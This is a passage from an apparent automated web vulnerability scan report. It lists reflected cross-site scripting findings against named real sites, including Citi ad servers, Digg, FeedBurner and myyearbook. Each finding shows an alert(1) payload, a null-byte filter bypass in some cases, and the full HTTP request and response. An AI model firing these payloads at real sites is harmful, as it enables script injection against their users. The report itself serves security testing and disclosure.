Confidence:	Certain
Host:	http://charmingshoppesinter.tt.omtrdc.net
Path:	/m2/charmingshoppesinter/mbox/standard

Issue detail

The value of the mbox request parameter is copied into the HTML document as plain text between tags. The payload 5cf46<script>alert(1)</script>1f2bd92cab8 was submitted in the mbox parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /m2/charmingshoppesinter/mbox/standard?mboxHost=www.lanebryant.com&mboxSession=1300624488082-862731&mboxPage=1300624488082-862731&screenHeight=1200&screenWidth=1920&browserWidth=1017&browserHeight=916&browserTimeOffset=-300&colorDepth=16&mboxCount=1&path=%2F&mbox=LB_global5cf46<script>alert(1)</script>1f2bd92cab8&mboxId=0&mboxTime=1300606488088&mboxURL=http%3A%2F%2Fwww.lanebryant.com%2F&mboxReferrer=&mboxVersion=39 HTTP/1.1
Host: charmingshoppesinter.tt.omtrdc.net
Proxy-Connection: keep-alive
Referer: http://www.lanebryant.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=CE085DEBCBBADCDE

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Content-Length: 205
Date: Sun, 20 Mar 2011 12:56:44 GMT
Server: Test & Target

mboxFactories.get('default').get('LB_global5cf46<script>alert(1)</script>1f2bd92cab8',0).setOffer(new mboxOfferDefault()).loaded();mboxFactories.get('default').getPCId().forceId("1300624488082-862731.17");

1.79. http://citi.bridgetrack.com/a/s/ [BT_PID parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://citi.bridgetrack.com
Path:	/a/s/

Issue detail

The value of the BT_PID request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 13d0d%3balert(1)//b3fe12123ae was submitted in the BT_PID parameter. This input was echoed as 13d0d;alert(1)//b3fe12123ae in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /a/s/?BT_PID=23271913d0d%3balert(1)//b3fe12123ae&BT_CON=1&BT_PM=1&r=0.1463664013426751&_u=visitor&_d=http://www.citibank.com HTTP/1.1
Host: citi.bridgetrack.com
Proxy-Connection: keep-alive
Referer: http://www.citibank.com/us/home.htm
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: application/x-javascript
Expires: Sat, 19 Mar 2011 12:34:47 GMT
Vary: Accept-Encoding
Server:
P3P: CP="NON DSP COR DEVa PSAa IVAo CONo OUR IND UNI PUR NAV DEM LOC", policyref="http://citi.bridgetrack.com/w3c/p3p.xml"
Set-Cookie: CitiBT=GUID=271C9A9157534902AE2577553635FDE6; expires=Wed, 14-Mar-2012 04:00:00 GMT; path=/
Set-Cookie: CitiBTSES=SID=B7D2F192F1BB49B4A3A4635E521DF36D; path=/
Date: Sun, 20 Mar 2011 12:34:47 GMT
Connection: close
Content-Length: 58

var bt_ad_content23271913d0d;alert(1)//b3fe12123ae=false;

1.80. http://citi.bridgetrack.com/a/s/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://citi.bridgetrack.com
Path:	/a/s/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ccff7"%3balert(1)//4d6c5f0d959 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ccff7";alert(1)//4d6c5f0d959 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /a/s/?BT_PID=232719&BT_CON=1&BT_PM=1&r=0.1463664013426751&_u=visitor&_d=http://www.citibank.com&ccff7"%3balert(1)//4d6c5f0d959=1 HTTP/1.1
Host: citi.bridgetrack.com
Proxy-Connection: keep-alive
Referer: http://www.citibank.com/us/home.htm
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: application/x-javascript
Expires: Sat, 19 Mar 2011 12:35:10 GMT
Vary: Accept-Encoding
Server:
P3P: CP="NON DSP COR DEVa PSAa IVAo CONo OUR IND UNI PUR NAV DEM LOC", policyref="http://citi.bridgetrack.com/w3c/p3p.xml"
Set-Cookie: AdData=S1C=1&S1T=201103200835100718&S1=98866z232719; expires=Thu, 19-May-2011 04:00:00 GMT; path=/
Set-Cookie: ASB9=TX=1300624511&Pb=3&A=8&SID=0407148A13274625B4EFFA967193D09B&Vn=271&Ct=0&Pc=0&S=&Cn=1&Pd=0&T=86408&Cr=98866&W=42840&Tr=42840&Cp=4112&P=232719&B=9; expires=Wed, 23-Mar-2011 04:00:00 GMT; path=/
Set-Cookie: CitiBT=GUID=3C8A2C6DCC134A88838206696D41BC66; expires=Wed, 14-Mar-2012 04:00:00 GMT; path=/
Set-Cookie: ATV9=39983d11V55Fc1c40Gc738Fc3c8Fc30HIc2KC8cc19QOc8ccc19QOccccc; expires=Wed, 23-Mar-2011 04:00:00 GMT; path=/
Set-Cookie: VCC9=; expires=Sat, 01-Jan-2000 05:00:00 GMT; path=/
Set-Cookie: CitiBTSES=SID=8D496D645DF54805B75132DE5CD34103; path=/
Date: Sun, 20 Mar 2011 12:35:09 GMT
Connection: close
Content-Length: 2769

var bt_ad_content232719=true;
function BTWrite(s) { document.write(s); }
function BTAdClick(szURL){window.open(szURL);};var n=navigator;var h="";var fmnv=5;var fmav=10;var btf="http://citi.bridgetrack
...[SNIP]...
t/assets/98863/CBNA_PlatVCR_SpecialOffer_688x153_18m_Feb2011.jpg";var btbase=btf.substring(0, btf.lastIndexOf("/"))+"/";var lg="http://citi.bridgetrack.com/a/c/?BT_BCID=253653&BT_SID=103028&_u=visitor&ccff7";alert(1)//4d6c5f0d959=1&_d=http%3A%2F%2Fwww%2Ecitibank%2Ecom";var lf="lid=&clickTAG=http%3A%2F%2Fciti%2Ebridgetrack%2Ecom%2Fads%5Fv2%2Fimg%5Fclick%2F%3FBT%5FBCID%3D253653%26BT%5FSID%3D103028%26%5Fu%3Dvisitor%26ccff7%22%3Ba
...[SNIP]...

1.81. http://digg.com/api/diggthis.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://digg.com
Path:	/api/diggthis.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00653da"><script>alert(1)</script>0615291860b was submitted in the REST URL parameter 1. This input was echoed as 653da"><script>alert(1)</script>0615291860b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Request

GET /api%00653da"><script>alert(1)</script>0615291860b/diggthis.js HTTP/1.1
Host: digg.com
Proxy-Connection: keep-alive
Referer: http://www.politicaldisgust.com/?cat=37
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: d=2a68c798e7a0b259fc8fefdeeca36a98a0266c70c4448c767c1a9ab096ee9ecf

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 13:31:57 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Set-Cookie: traffic_control=-777143541355773928%3A196; expires=Mon, 21-Mar-2011 13:31:57 GMT; path=/; domain=digg.com
X-Digg-Time: D=249678 10.2.129.155
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 16469

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>error_ - Digg</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics, technology
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="Digg" href="/api%00653da"><script>alert(1)</script>0615291860b/diggthis.js.rss">
...[SNIP]...

1.82. http://digg.com/api/diggthis.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://digg.com
Path:	/api/diggthis.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %002bf49"><script>alert(1)</script>11cb41315c9 was submitted in the REST URL parameter 2. This input was echoed as 2bf49"><script>alert(1)</script>11cb41315c9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Request

GET /api/diggthis.js%002bf49"><script>alert(1)</script>11cb41315c9 HTTP/1.1
Host: digg.com
Proxy-Connection: keep-alive
Referer: http://www.politicaldisgust.com/?cat=37
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: d=2a68c798e7a0b259fc8fefdeeca36a98a0266c70c4448c767c1a9ab096ee9ecf

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 13:32:00 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Set-Cookie: traffic_control=-777143541355773928%3A196; expires=Mon, 21-Mar-2011 13:32:01 GMT; path=/; domain=digg.com
X-Digg-Time: D=273115 10.2.130.111
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 16469

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>error_ - Digg</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics, technology
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="Digg" href="/api/diggthis.js%002bf49"><script>alert(1)</script>11cb41315c9.rss">
...[SNIP]...

1.83. http://feeds.feedburner.com/~s/politicaldisgust [i parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://feeds.feedburner.com
Path:	/~s/politicaldisgust

Issue detail

The value of the i request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4fe71"%3balert(1)//71799980c14 was submitted in the i parameter. This input was echoed as 4fe71";alert(1)//71799980c14 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /~s/politicaldisgust?i=http://www.politicaldisgust.com/?p=16834fe71"%3balert(1)//71799980c14 HTTP/1.1
Host: feeds.feedburner.com
Proxy-Connection: keep-alive
Referer: http://www.politicaldisgust.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=UTF-8
Date: Sun, 20 Mar 2011 13:13:26 GMT
Expires: Sun, 20 Mar 2011 13:13:26 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Server: GSE
Content-Length: 726

var fStartPost=1;if(window.feedburner_currPost!=null){window.feedburner_currPost++}else{window.feedburner_currPost=1}if(document.body.getAttribute("fStartPost")){fs=parseInt(document.body.getAttribute
...[SNIP]...
se{window.feedburner_startPostOverride=fStartPost}if(window.feedburner_currPost==fStartPost){feedSrc='http://feeds.feedburner.com/~s/politicaldisgust?i='+escape("http://www.politicaldisgust.com/?p=16834fe71";alert(1)//71799980c14")+'&showad=true';document.write('<script src="'+feedSrc+'" type="text/javascript">
...[SNIP]...

1.84. http://home.myyearbook.com/feed/BlindDateFeedItems [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://home.myyearbook.com
Path:	/feed/BlindDateFeedItems

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload b7d08<img%20src%3da%20onerror%3dalert(1)>4d89b4f4f76 was submitted in the REST URL parameter 2. This input was echoed as b7d08<img src=a onerror=alert(1)>4d89b4f4f76 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /feed/BlindDateFeedItemsb7d08<img%20src%3da%20onerror%3dalert(1)>4d89b4f4f76?callback=jsonp1300624487166 HTTP/1.1
Host: home.myyearbook.com
Proxy-Connection: keep-alive
Referer: http://www.myyearbook.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mybRegTheme=hbl; mybRegData=%5B%5D; POSTAff2Cookie=HBL; MYB_TARGET=_unknown_1000_____; __gads=ID=f3640abbd1b1cdb3:T=1300624489:S=ALNI_MbrX_Emgz4sKka8nHjyRqG1O3ly8w; __utmz=138725551.1300624490.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=138725551.528389796.1300624489.1300624489.1300624489.1; __utmc=138725551; __utmb=138725551.1.10.1300624489; __qca=P0-193244728-1300624490343; PHPSESSID=fdf70e60bc7204869a6429bf4a1984b3

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 13:07:39 GMT
Server: Apache
Set-Cookie: PHPSESSID=fdf70e60bc7204869a6429bf4a1984b3; path=/; domain=.myyearbook.com
Expires: Sun, 20 Mar 2011 13:22:39 GMT
Last-Modified: Sun, 20 Mar 2011 13:05:05 GMT
Etag: 0c987627473d41e8afad35a927d96268
Vary: Accept-Encoding
Connection: close
Content-Type: text/javascript;charset=UTF-8
X-MyPoolMember: 10.100.10.192
Content-Length: 129

hblFeed({"error":true,"Message":"Invalid Feed Item Requested: BlindDateFeedItemsb7d08<img src=a onerror=alert(1)>4d89b4f4f76"});

1.85. http://home.myyearbook.com/feed/battlesFeedItems [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://home.myyearbook.com
Path:	/feed/battlesFeedItems

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 12355<img%20src%3da%20onerror%3dalert(1)>7f550c7b706 was submitted in the REST URL parameter 2. This input was echoed as 12355<img src=a onerror=alert(1)>7f550c7b706 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /feed/battlesFeedItems12355<img%20src%3da%20onerror%3dalert(1)>7f550c7b706?callback=jsonp1300624487167 HTTP/1.1
Host: home.myyearbook.com
Proxy-Connection: keep-alive
Referer: http://www.myyearbook.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mybRegTheme=hbl; mybRegData=%5B%5D; POSTAff2Cookie=HBL; MYB_TARGET=_unknown_1000_____; __gads=ID=f3640abbd1b1cdb3:T=1300624489:S=ALNI_MbrX_Emgz4sKka8nHjyRqG1O3ly8w; __utmz=138725551.1300624490.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=138725551.528389796.1300624489.1300624489.1300624489.1; __utmc=138725551; __utmb=138725551.1.10.1300624489; __qca=P0-193244728-1300624490343; PHPSESSID=fdf70e60bc7204869a6429bf4a1984b3

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 13:07:56 GMT
Server: Apache
Set-Cookie: PHPSESSID=fdf70e60bc7204869a6429bf4a1984b3; path=/; domain=.myyearbook.com
Expires: Sun, 20 Mar 2011 13:22:56 GMT
Last-Modified: Sun, 20 Mar 2011 13:05:05 GMT
Etag: 76ef4c1074b004071ca723ad1d62de37
Vary: Accept-Encoding
Connection: close
Content-Type: text/javascript;charset=UTF-8
X-MyPoolMember: 10.100.10.194
Content-Length: 127

hblFeed({"error":true,"Message":"Invalid Feed Item Requested: battlesFeedItems12355<img src=a onerror=alert(1)>7f550c7b706"});

1.86. http://home.myyearbook.com/feed/causesFeedItems [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://home.myyearbook.com
Path:	/feed/causesFeedItems

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 8d933<img%20src%3da%20onerror%3dalert(1)>c88a48add61 was submitted in the REST URL parameter 2. This input was echoed as 8d933<img src=a onerror=alert(1)>c88a48add61 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /feed/causesFeedItems8d933<img%20src%3da%20onerror%3dalert(1)>c88a48add61?callback=jsonp1300624487165 HTTP/1.1
Host: home.myyearbook.com
Proxy-Connection: keep-alive
Referer: http://www.myyearbook.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mybRegTheme=hbl; mybRegData=%5B%5D; POSTAff2Cookie=HBL; MYB_TARGET=_unknown_1000_____; __gads=ID=f3640abbd1b1cdb3:T=1300624489:S=ALNI_MbrX_Emgz4sKka8nHjyRqG1O3ly8w; __utmz=138725551.1300624490.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=138725551.528389796.1300624489.1300624489.1300624489.1; __utmc=138725551; __utmb=138725551.1.10.1300624489; __qca=P0-193244728-1300624490343; PHPSESSID=fdf70e60bc7204869a6429bf4a1984b3

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 13:07:34 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Set-Cookie: PHPSESSID=fdf70e60bc7204869a6429bf4a1984b3; path=/; domain=.myyearbook.com
Expires: Sun, 20 Mar 2011 13:22:34 GMT
Last-Modified: Sun, 20 Mar 2011 13:05:05 GMT
Etag: 82ba430f92a3340b4b8a8e6800738591
Vary: Accept-Encoding
Connection: close
Content-Type: text/javascript;charset=UTF-8
X-MyPoolMember: 10.100.10.201
Content-Length: 126

hblFeed({"error":true,"Message":"Invalid Feed Item Requested: causesFeedItems8d933<img src=a onerror=alert(1)>c88a48add61"});

1.87. http://home.myyearbook.com/feed/flirtFeedItems [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://home.myyearbook.com
Path:	/feed/flirtFeedItems

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 8a073<img%20src%3da%20onerror%3dalert(1)>f7d490546b was submitted in the REST URL parameter 2. This input was echoed as 8a073<img src=a onerror=alert(1)>f7d490546b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /feed/flirtFeedItems8a073<img%20src%3da%20onerror%3dalert(1)>f7d490546b?callback=jsonp1300624487170 HTTP/1.1
Host: home.myyearbook.com
Proxy-Connection: keep-alive
Referer: http://www.myyearbook.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mybRegTheme=hbl; mybRegData=%5B%5D; POSTAff2Cookie=HBL; MYB_TARGET=_unknown_1000_____; __gads=ID=f3640abbd1b1cdb3:T=1300624489:S=ALNI_MbrX_Emgz4sKka8nHjyRqG1O3ly8w; __utmz=138725551.1300624490.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=138725551.528389796.1300624489.1300624489.1300624489.1; __utmc=138725551; __utmb=138725551.1.10.1300624489; __qca=P0-193244728-1300624490343; PHPSESSID=fdf70e60bc7204869a6429bf4a1984b3

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 13:08:11 GMT
Server: Apache
Set-Cookie: PHPSESSID=fdf70e60bc7204869a6429bf4a1984b3; path=/; domain=.myyearbook.com
Expires: Sun, 20 Mar 2011 13:23:11 GMT
Last-Modified: Sun, 20 Mar 2011 13:05:05 GMT
Etag: e50746cb339204bd79cf9886d6729ef9
Vary: Accept-Encoding
Connection: close
Content-Type: text/javascript;charset=UTF-8
X-MyPoolMember: 10.100.10.194
Content-Length: 124

hblFeed({"error":true,"Message":"Invalid Feed Item Requested: flirtFeedItems8a073<img src=a onerror=alert(1)>f7d490546b"});

1.88. http://home.myyearbook.com/feed/gamesFeedItems [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://home.myyearbook.com
Path:	/feed/gamesFeedItems

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 4302f<img%20src%3da%20onerror%3dalert(1)>88439d06597 was submitted in the REST URL parameter 2. This input was echoed as 4302f<img src=a onerror=alert(1)>88439d06597 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /feed/gamesFeedItems4302f<img%20src%3da%20onerror%3dalert(1)>88439d06597?callback=jsonp1300624487157 HTTP/1.1
Host: home.myyearbook.com
Proxy-Connection: keep-alive
Referer: http://www.myyearbook.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=fdf70e60bc7204869a6429bf4a1984b3; mybRegTheme=hbl; mybRegData=%5B%5D; POSTAff2Cookie=HBL; MYB_TARGET=_unknown_1000_____; __gads=ID=f3640abbd1b1cdb3:T=1300624489:S=ALNI_MbrX_Emgz4sKka8nHjyRqG1O3ly8w

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 12:50:08 GMT
Server: Apache
Set-Cookie: PHPSESSID=fdf70e60bc7204869a6429bf4a1984b3; path=/; domain=.myyearbook.com
Expires: Sun, 20 Mar 2011 13:05:08 GMT
Last-Modified: Sun, 20 Mar 2011 12:50:06 GMT
Etag: 1b9d8763edb845c5aadee2c62c61cc14
Vary: Accept-Encoding
Connection: close
Content-Type: text/javascript;charset=UTF-8
X-MyPoolMember: 10.100.10.192
Content-Length: 125

hblFeed({"error":true,"Message":"Invalid Feed Item Requested: gamesFeedItems4302f<img src=a onerror=alert(1)>88439d06597"});

1.89. http://home.myyearbook.com/feed/giftFeedItems [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://home.myyearbook.com
Path:	/feed/giftFeedItems

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload b7bbc<img%20src%3da%20onerror%3dalert(1)>b453df42966 was submitted in the REST URL parameter 2. This input was echoed as b7bbc<img src=a onerror=alert(1)>b453df42966 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /feed/giftFeedItemsb7bbc<img%20src%3da%20onerror%3dalert(1)>b453df42966?callback=jsonp1300624487160 HTTP/1.1
Host: home.myyearbook.com
Proxy-Connection: keep-alive
Referer: http://www.myyearbook.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mybRegTheme=hbl; mybRegData=%5B%5D; POSTAff2Cookie=HBL; MYB_TARGET=_unknown_1000_____; __gads=ID=f3640abbd1b1cdb3:T=1300624489:S=ALNI_MbrX_Emgz4sKka8nHjyRqG1O3ly8w; __utmz=138725551.1300624490.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=138725551.528389796.1300624489.1300624489.1300624489.1; __utmc=138725551; __utmb=138725551.1.10.1300624489; __qca=P0-193244728-1300624490343; PHPSESSID=fdf70e60bc7204869a6429bf4a1984b3

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 13:04:37 GMT
Server: Apache
Set-Cookie: PHPSESSID=fdf70e60bc7204869a6429bf4a1984b3; path=/; domain=.myyearbook.com
Expires: Sun, 20 Mar 2011 13:19:37 GMT
Last-Modified: Sun, 20 Mar 2011 13:00:04 GMT
Etag: 0ba871285af971a37359c72bc9430a84
Vary: Accept-Encoding
Connection: close
Content-Type: text/javascript;charset=UTF-8
X-MyPoolMember: 10.100.10.192
Content-Length: 124

hblFeed({"error":true,"Message":"Invalid Feed Item Requested: giftFeedItemsb7bbc<img src=a onerror=alert(1)>b453df42966"});

1.90. http://home.myyearbook.com/feed/matchFeedItems [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://home.myyearbook.com
Path:	/feed/matchFeedItems

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 7cfce<img%20src%3da%20onerror%3dalert(1)>d8cbed50ea9 was submitted in the REST URL parameter 2. This input was echoed as 7cfce<img src=a onerror=alert(1)>d8cbed50ea9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /feed/matchFeedItems7cfce<img%20src%3da%20onerror%3dalert(1)>d8cbed50ea9?callback=jsonp1300624487164 HTTP/1.1
Host: home.myyearbook.com
Proxy-Connection: keep-alive
Referer: http://www.myyearbook.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mybRegTheme=hbl; mybRegData=%5B%5D; POSTAff2Cookie=HBL; MYB_TARGET=_unknown_1000_____; __gads=ID=f3640abbd1b1cdb3:T=1300624489:S=ALNI_MbrX_Emgz4sKka8nHjyRqG1O3ly8w; __utmz=138725551.1300624490.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=138725551.528389796.1300624489.1300624489.1300624489.1; __utmc=138725551; __utmb=138725551.1.10.1300624489; __qca=P0-193244728-1300624490343; PHPSESSID=fdf70e60bc7204869a6429bf4a1984b3

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 13:07:34 GMT
Server: Apache
Set-Cookie: PHPSESSID=fdf70e60bc7204869a6429bf4a1984b3; path=/; domain=.myyearbook.com
Expires: Sun, 20 Mar 2011 13:22:34 GMT
Last-Modified: Sun, 20 Mar 2011 13:05:05 GMT
Etag: c5929e853b8d2e7e97475c4fad295aa0
Vary: Accept-Encoding
Connection: close
Content-Type: text/javascript;charset=UTF-8
X-MyPoolMember: 10.100.10.192
Content-Length: 125

hblFeed({"error":true,"Message":"Invalid Feed Item Requested: matchFeedItems7cfce<img src=a onerror=alert(1)>d8cbed50ea9"});

1.91. http://home.myyearbook.com/feed/myMagFeedItems [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://home.myyearbook.com
Path:	/feed/myMagFeedItems

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 83ac5<img%20src%3da%20onerror%3dalert(1)>8ffe07b1407 was submitted in the REST URL parameter 2. This input was echoed as 83ac5<img src=a onerror=alert(1)>8ffe07b1407 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

